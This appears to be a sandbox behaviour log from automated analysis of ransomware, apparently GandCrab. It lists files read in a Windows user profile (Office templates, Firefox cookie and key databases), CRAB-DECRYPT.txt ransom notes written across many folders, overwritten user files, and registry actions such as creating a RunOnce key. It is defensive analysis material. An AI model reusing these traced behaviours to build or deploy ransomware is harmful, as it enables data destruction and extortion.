Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328916[[fn=Converging Text]].glox size = 1048576, size_out = 11380 True 1
Fn
Data
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328919[[fn=Hexagon Radial]].glox size = 1048576, size_out = 6024 True 1
Fn
Data
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328925[[fn=Interconnected Block Process]].glox size = 1048576, size_out = 9191 True 1
Fn
Data
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328932[[fn=Picture Frame]].glox size = 1048576, size_out = 4326 True 1
Fn
Data
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328935[[fn=Picture Organization Chart]].glox size = 1048576, size_out = 7370 True 1
Fn
Data
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328940[[fn=Radial Picture List]].glox size = 1048576, size_out = 5596 True 1
Fn
Data
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328951[[fn=Tabbed Arc]].glox size = 1048576, size_out = 3683 True 1
Fn
Data
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328972[[fn=Tab List]].glox size = 1048576, size_out = 4888 True 1
Fn
Data
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328975[[fn=Theme Picture Accent]].glox size = 1048576, size_out = 6448 True 1
Fn
Data
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328983[[fn=Theme Picture Alternating Accent]].glox size = 1048576, size_out = 5630 True 1
Fn
Data
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328986[[fn=Theme Picture Grid]].glox size = 1048576, size_out = 6193 True 1
Fn
Data
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328990[[fn=Varying Width List]].glox size = 1048576, size_out = 3075 True 1
Fn
Data
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328998[[fn=Rings]].glox size = 1048576, size_out = 5151 True 1
Fn
Data
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851216[[fn=apasixtheditionofficeonline]].xsl size = 1048576, size_out = 333258 True 1
Fn
Data
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851217[[fn=chicago]].xsl size = 1048576, size_out = 296658 True 1
Fn
Data
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851218[[fn=gb]].xsl size = 1048576, size_out = 268317 True 1
Fn
Data
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851219[[fn=gostname]].xsl size = 1048576, size_out = 255948 True 1
Fn
Data
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851220[[fn=gosttitle]].xsl size = 1048576, size_out = 251032 True 1
Fn
Data
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851221[[fn=harvardanglia2008officeonline]].xsl size = 1048576, size_out = 284415 True 1
Fn
Data
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851222[[fn=ieee2006officeonline]].xsl size = 1048576, size_out = 294178 True 1
Fn
Data
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851223[[fn=iso690]].xsl size = 1048576, size_out = 270198 True 1
Fn
Data
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851224[[fn=iso690nmerical]].xsl size = 1048576, size_out = 217137 True 1
Fn
Data
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851225[[fn=mlaseventheditionofficeonline]].xsl size = 1048576, size_out = 254875 True 1
Fn
Data
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851226[[fn=turabian]].xsl size = 1048576, size_out = 344303 True 1
Fn
Data
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851227[[fn=sist02]].xsl size = 1048576, size_out = 250983 True 1
Fn
Data
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM01840907[[fn=Equations]].dotx size = 1048576, size_out = 51826 True 1
Fn
Data
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM02835231[[fn=Text Cover with TOC (Student Report Blue design)]].docx size = 1048576, size_out = 61649 True 1
Fn
Data
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM02835232[[fn=Text Cover (Student Report Blue design)]].docx size = 1048576, size_out = 58010 True 1
Fn
Data
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM02835233[[fn=Text Sidebar (Annual Report Red and Black design)]].docx size = 1048576, size_out = 47296 True 1
Fn
Data
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM02835264[[fn=Cover Page (Annual Report Red and Black design)]].docx size = 1048576, size_out = 59085 True 1
Fn
Data
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM02835265[[fn=Cover Page (Annual Report Timeless design)]].docx size = 1048576, size_out = 58498 True 1
Fn
Data
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM02835266[[fn=Cover Letter (Chronological Resume Simple design)]].docx size = 1048576, size_out = 56927 True 1
Fn
Data
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM02835267[[fn=Cover with Logo (Annual Report Red and Black design)]].docx size = 1048576, size_out = 63388 True 1
Fn
Data
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM02835268[[fn=Photo Cover (Student Report Blue design)]].docx size = 1048576, size_out = 321660 True 1
Fn
Data
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM02835269[[fn=Photo Cover with TOC (Student Report blue design)]].docx size = 1048576, size_out = 314136 True 1
Fn
Data
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM02835270[[fn=Photo Sidebar (Annual Report Red and Black design)]].docx size = 1048576, size_out = 231239 True 1
Fn
Data
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM02835271[[fn=Sample Table (Annual Report Red and Black design)]].docx size = 1048576, size_out = 29601 True 1
Fn
Data
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM02835272[[fn=Sample Table (Annual Report Timeless design)]].docx size = 1048576, size_out = 45413 True 1
Fn
Data
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM02836362[[fn=Cover letter (Resume Timeless Design)]].docx size = 1048576, size_out = 50977 True 1
Fn
Data
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM03998158[[fn=Element]].dotx size = 1048576, size_out = 34415 True 1
Fn
Data
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM03998159[[fn=Insight]].dotx size = 1048576, size_out = 1048576 True 3
Fn
Data
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM03998159[[fn=Insight]].dotx size = 1048576, size_out = 319348 True 1
Fn
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\Normal.dotm size = 1048576, size_out = 19050 True 1
Fn
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\Welcome to Word.dotx size = 1048576, size_out = 1048576 True 1
Fn
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\Welcome to Word.dotx size = 1048576, size_out = 147357 True 1
Fn
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC size = 1048576, size_out = 22 True 1
Fn
Read C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\addons.json size = 1048576, size_out = 24 True 1
Fn
Read C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\addonStartup.json.lz4 size = 1048576, size_out = 655 True 1
Fn
Read C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\blocklist.xml size = 1048576, size_out = 278205 True 1
Fn
Read C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\cert8.db size = 1048576, size_out = 65536 True 1
Fn
Read C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\compatibility.ini size = 1048576, size_out = 199 True 1
Fn
Read C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\containers.json size = 1048576, size_out = 809 True 1
Fn
Read C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\content-prefs.sqlite size = 1048576, size_out = 229376 True 1
Fn
Read C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\cookies.sqlite size = 1048576, size_out = 524288 True 1
Fn
Read C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\datareporting\archived\2017-08\1503651440860.2d520ad0-8005-4317-b4fd-571af846ed8d.new-profile.jsonlz4 size = 1048576, size_out = 2931 True 1
Fn
Read C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\datareporting\archived\2017-08\1503651441015.321b9820-ddf0-4472-8833-27c2104c93fa.main.jsonlz4 size = 1048576, size_out = 6296 True 1
Fn
Read C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\datareporting\archived\2017-08\1503651456011.5f95b583-d699-497d-975d-4dba64e21259.main.jsonlz4 size = 1048576, size_out = 5884 True 1
Fn
Read C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\datareporting\session-state.json size = 1048576, size_out = 161 True 1
Fn
Read C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\datareporting\state.json size = 1048576, size_out = 51 True 1
Fn
Read C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\extensions.json size = 1048576, size_out = 10542 True 1
Fn
Read C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\favicons.sqlite size = 1048576, size_out = 1048576 True 5
Fn
Read C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\favicons.sqlite size = 1048576, size_out = 0 True 1
Fn
Read C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\gmp-gmpopenh264\1.6\gmpopenh264.info size = 1048576, size_out = 116 True 1
Fn
Read C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\gmp-widevinecdm\1.4.8.903\LICENSE.txt size = 1048576, size_out = 479 True 1
Fn
Read C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\gmp-widevinecdm\1.4.8.903\manifest.json size = 1048576, size_out = 348 True 1
Fn
Read C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\gmp-widevinecdm\1.4.8.903\widevinecdm.dll.lib size = 1048576, size_out = 2456 True 1
Fn
Read C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\handlers.json size = 1048576, size_out = 683 True 1
Fn
Read C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\key3.db size = 1048576, size_out = 16384 True 1
Fn
Read C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\permissions.sqlite size = 1048576, size_out = 98304 True 1
Fn
Read C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\places.sqlite size = 1048576, size_out = 1048576 True 2
Fn
Write C:\$Recycle.Bin\S-1-5-21-2172869166-1497266965-2109836178-1000\\CRAB-DECRYPT.txt size = 3704 True 1
Fn
Data
Write C:\$Recycle.Bin\S-1-5-21-2172869166-1497266965-2109836178-1000\$IPEWI8I.TMP size = 160 True 1
Fn
Data
Write C:\$Recycle.Bin\S-1-5-21-2172869166-1497266965-2109836178-1000\$IPEWI8I.TMP size = 256 True 2
Fn
Data
Write C:\$Recycle.Bin\S-1-5-21-2172869166-1497266965-2109836178-1000\$IPEWI8I.TMP size = 16 True 1
Fn
Data
Write C:\Users\Nd9E1FYi\\CRAB-DECRYPT.txt size = 3704 True 1
Fn
Data
Write C:\Users\Nd9E1FYi\AppData\\CRAB-DECRYPT.txt size = 3704 True 1
Fn
Data
Write C:\Users\Nd9E1FYi\AppData\Roaming\\CRAB-DECRYPT.txt size = 3704 True 1
Fn
Data
Write C:\Users\Nd9E1FYi\AppData\Roaming\27YjI_tg_wmDvK-.gif size = 2544 True 1
Fn
Data
Write C:\Users\Nd9E1FYi\AppData\Roaming\27YjI_tg_wmDvK-.gif size = 256 True 2
Fn
Data
Write C:\Users\Nd9E1FYi\AppData\Roaming\27YjI_tg_wmDvK-.gif size = 16 True 1
Fn
Data
Write C:\Users\Nd9E1FYi\AppData\Roaming\2KxNzGrrl.doc size = 76544 True 1
Fn
Data
Write C:\Users\Nd9E1FYi\AppData\Roaming\2KxNzGrrl.doc size = 256 True 2
Fn
Data
Write C:\Users\Nd9E1FYi\AppData\Roaming\2KxNzGrrl.doc size = 16 True 1
Fn
Data
Write C:\Users\Nd9E1FYi\AppData\Roaming\57VfXi.wav size = 27792 True 1
Fn
Data
Write C:\Users\Nd9E1FYi\AppData\Roaming\57VfXi.wav size = 256 True 2
Fn
Data
Write C:\Users\Nd9E1FYi\AppData\Roaming\57VfXi.wav size = 16 True 1
Fn
Data
Write C:\Users\Nd9E1FYi\AppData\Roaming\7y338WW30Khw_Kvdj.bmp size = 94400 True 1
Fn
Data
Write C:\Users\Nd9E1FYi\AppData\Roaming\7y338WW30Khw_Kvdj.bmp size = 256 True 2
Fn
Data
Write C:\Users\Nd9E1FYi\AppData\Roaming\7y338WW30Khw_Kvdj.bmp size = 16 True 1
Fn
Data
Write C:\Users\Nd9E1FYi\AppData\Roaming\80nauBl1bcqQ.mp3 size = 2048 True 1
Fn
Data
Write C:\Users\Nd9E1FYi\AppData\Roaming\80nauBl1bcqQ.mp3 size = 256 True 2
Fn
Data
Write C:\Users\Nd9E1FYi\AppData\Roaming\80nauBl1bcqQ.mp3 size = 16 True 1
Fn
Data
Write C:\Users\Nd9E1FYi\AppData\Roaming\9HQb6.gif size = 34336 True 1
Fn
Data
Write C:\Users\Nd9E1FYi\AppData\Roaming\9HQb6.gif size = 256 True 2
Fn
Data
Write C:\Users\Nd9E1FYi\AppData\Roaming\9HQb6.gif size = 16 True 1
Fn
Data
Write C:\Users\Nd9E1FYi\AppData\Roaming\aD456ynae.png size = 31408 True 1
Fn
Data
Write C:\Users\Nd9E1FYi\AppData\Roaming\aD456ynae.png size = 256 True 2
Fn
Data
Write C:\Users\Nd9E1FYi\AppData\Roaming\aD456ynae.png size = 16 True 1
Fn
Data
Write C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\\CRAB-DECRYPT.txt size = 3704 True 1
Fn
Data
Write C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Acrobat\\CRAB-DECRYPT.txt size = 3704 True 1
Fn
Data
Write C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Acrobat\DC\\CRAB-DECRYPT.txt size = 3704 True 1
Fn
Data
Write C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Acrobat\DC\Collab\\CRAB-DECRYPT.txt size = 3704 True 1
Fn
Data
Write C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Acrobat\DC\Forms\\CRAB-DECRYPT.txt size = 3704 True 1
Fn
Data
Write C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Acrobat\DC\JSCache\\CRAB-DECRYPT.txt size = 3704 True 1
Fn
Data
Write C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Acrobat\DC\Security\\CRAB-DECRYPT.txt size = 3704 True 1
Fn
Data
Write C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Acrobat\DC\Security\addressbook.acrodata size = 7872 True 1
Fn
Data
Write C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Acrobat\DC\Security\addressbook.acrodata size = 256 True 2
Fn
Data
Write C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Acrobat\DC\Security\addressbook.acrodata size = 16 True 1
Fn
Data
Write C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\\CRAB-DECRYPT.txt size = 3704 True 1
Fn
Data
Write C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl size = 640 True 1
Fn
Data
Write C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl size = 256 True 2
Fn
Data
Write C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl size = 16 True 1
Fn
Data
Write C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl size = 432 True 1
Fn
Data
Write C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl size = 256 True 2
Fn
Data
Write C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl size = 16 True 1
Fn
Data
Write C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Flash Player\\CRAB-DECRYPT.txt size = 3704 True 1
Fn
Data
Write C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Flash Player\AssetCache\\CRAB-DECRYPT.txt size = 3704 True 1
Fn
Data
Write C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Flash Player\AssetCache\EYGUEQKQ\\CRAB-DECRYPT.txt size = 3704 True 1
Fn
Data
Write C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Flash Player\NativeCache\\CRAB-DECRYPT.txt size = 3704 True 1
Fn
Data
Write C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Headlights\\CRAB-DECRYPT.txt size = 3704 True 1
Fn
Data
Write C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Linguistics\\CRAB-DECRYPT.txt size = 3704 True 1
Fn
Data
Write C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\LogTransport2\\CRAB-DECRYPT.txt size = 3704 True 1
Fn
Data
Write C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\LogTransport2\Logs\\CRAB-DECRYPT.txt size = 3704 True 1
Fn
Data
Write C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\LogTransport2\Logs\ulog_Acrobat12_Reader_3980e2e3-09b5-4737-a657-22675b06a39a_03db394c-1477-45d1-895c-00e42db7e723_0.rdy size = 23376 True 1
Fn
Data
Write C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\LogTransport2\Logs\ulog_Acrobat12_Reader_3980e2e3-09b5-4737-a657-22675b06a39a_03db394c-1477-45d1-895c-00e42db7e723_0.rdy size = 256 True 2
Fn
Data
Write C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\LogTransport2\Logs\ulog_Acrobat12_Reader_3980e2e3-09b5-4737-a657-22675b06a39a_03db394c-1477-45d1-895c-00e42db7e723_0.rdy size = 16 True 1
Fn
Data
Write C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\LogTransport2\LogTransport2.cfg size = 224 True 1
Fn
Data
Write C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\LogTransport2\LogTransport2.cfg size = 256 True 2
Fn
Data
Write C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\LogTransport2\LogTransport2.cfg size = 16 True 1
Fn
Data
Write C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Sonar\\CRAB-DECRYPT.txt size = 3704 True 1
Fn
Data
Write C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Sonar\Sonar1.0\\CRAB-DECRYPT.txt size = 3704 True 1
Fn
Data
Write C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Sonar\Sonar1.0\sonar_policy.xml size = 18768 True 1
Fn
Data
Write C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Sonar\Sonar1.0\sonar_policy.xml size = 256 True 2
Fn
Data
Write C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Sonar\Sonar1.0\sonar_policy.xml size = 16 True 1
Fn
Data
Write C:\Users\Nd9E1FYi\AppData\Roaming\BC4CK.mp3 size = 51504 True 1
Fn
Data
Write C:\Users\Nd9E1FYi\AppData\Roaming\BC4CK.mp3 size = 256 True 2
Fn
Data
Write C:\Users\Nd9E1FYi\AppData\Roaming\BC4CK.mp3 size = 16 True 1
Fn
Data
Write C:\Users\Nd9E1FYi\AppData\Roaming\Cx 2hVTJNEPKc.mp3 size = 38976 True 1
Fn
Data
Write C:\Users\Nd9E1FYi\AppData\Roaming\Cx 2hVTJNEPKc.mp3 size = 256 True 2
Fn
Data
Write C:\Users\Nd9E1FYi\AppData\Roaming\Cx 2hVTJNEPKc.mp3 size = 16 True 1
Fn
Data
Write C:\Users\Nd9E1FYi\AppData\Roaming\d 3OIHehyy3Jgx.mp4 size = 89232 True 1
Fn
Data
Write C:\Users\Nd9E1FYi\AppData\Roaming\d 3OIHehyy3Jgx.mp4 size = 256 True 2
Fn
Data
Write C:\Users\Nd9E1FYi\AppData\Roaming\d 3OIHehyy3Jgx.mp4 size = 16 True 1
Fn
Data
Write C:\Users\Nd9E1FYi\AppData\Roaming\Dz28gHwyj9-jVurMnBQV.ots size = 99536 True 1
Fn
Data
Write C:\Users\Nd9E1FYi\AppData\Roaming\Dz28gHwyj9-jVurMnBQV.ots size = 256 True 2
Fn
Data
Write C:\Users\Nd9E1FYi\AppData\Roaming\Dz28gHwyj9-jVurMnBQV.ots size = 16 True 1
Fn
Data
Write C:\Users\Nd9E1FYi\AppData\Roaming\fezrNJYET8dXBnLxa.mp4 size = 29760 True 1
Fn
Data
Write C:\Users\Nd9E1FYi\AppData\Roaming\fezrNJYET8dXBnLxa.mp4 size = 256 True 2
Fn
Data
Write C:\Users\Nd9E1FYi\AppData\Roaming\fezrNJYET8dXBnLxa.mp4 size = 16 True 1
Fn
Data
Write C:\Users\Nd9E1FYi\AppData\Roaming\FKoQ.odt size = 86608 True 1
Fn
Data
Write C:\Users\Nd9E1FYi\AppData\Roaming\FKoQ.odt size = 256 True 2
Fn
Data
Write C:\Users\Nd9E1FYi\AppData\Roaming\FKoQ.odt size = 16 True 1
Fn
Data
Write C:\Users\Nd9E1FYi\AppData\Roaming\gfLne6ecA1jmfG6m8.mkv size = 89248 True 1
Fn
Data
Write C:\Users\Nd9E1FYi\AppData\Roaming\gfLne6ecA1jmfG6m8.mkv size = 256 True 2
Fn
Data
Write C:\Users\Nd9E1FYi\AppData\Roaming\gfLne6ecA1jmfG6m8.mkv size = 16 True 1
Fn
Data
Write C:\Users\Nd9E1FYi\AppData\Roaming\Im-Xi-TXJUjXU8gwjeAN.avi size = 52416 True 1
Fn
Data
Write C:\Users\Nd9E1FYi\AppData\Roaming\Im-Xi-TXJUjXU8gwjeAN.avi size = 256 True 2
Fn
Data
Write C:\Users\Nd9E1FYi\AppData\Roaming\Im-Xi-TXJUjXU8gwjeAN.avi size = 16 True 1
Fn
Data
Write C:\Users\Nd9E1FYi\AppData\Roaming\iVmnctwjmS.swf size = 100304 True 1
Fn
Data
Write C:\Users\Nd9E1FYi\AppData\Roaming\iVmnctwjmS.swf size = 256 True 2
Fn
Data
Write C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\SystemCertificates\\CRAB-DECRYPT.txt size = 3704 True 1
Fn
Data
Write C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\SystemCertificates\My\\CRAB-DECRYPT.txt size = 3704 True 1
Fn
Data
Write C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\\CRAB-DECRYPT.txt size = 3704 True 1
Fn
Data
Write C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs\\CRAB-DECRYPT.txt size = 3704 True 1
Fn
Data
Write C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs\\CRAB-DECRYPT.txt size = 3704 True 1
Fn
Data
For performance reasons, the remaining 483 entries are omitted.
The remaining entries can be found in glog.xml.
Registry (28)
»
Operation Key Additional Information Success Count Logfile
Create Key HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 - True 2
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 - True 2
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters - True 1
Fn
Open Key HKEY_CURRENT_USER\Control Panel\International - True 1
Fn
Open Key HKEY_CURRENT_USER\Keyboard Layout\Preload - True 2
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 - True 2
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters value_name = Domain, data = 0 True 1
Fn
Read Value HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 value_name = ProcessorNameString, data = 73 True 1
Fn
Read Value HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 value_name = Identifier, data = 73 True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters value_name = Domain, data = 0 True 1
Fn
Read Value HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 value_name = ProcessorNameString, data = 73 True 1
Fn
Read Value HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 value_name = Identifier, data = 73 True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters value_name = Domain, data = 0 True 1
Fn
Read Value HKEY_CURRENT_USER\Control Panel\International value_name = LocaleName, data = 101 True 1
Fn
Read Value HKEY_CURRENT_USER\Keyboard Layout\Preload value_name = 1, data = 48 True 1
Fn
Read Value HKEY_CURRENT_USER\Keyboard Layout\Preload value_name = 2, data = 48 False 1
Fn
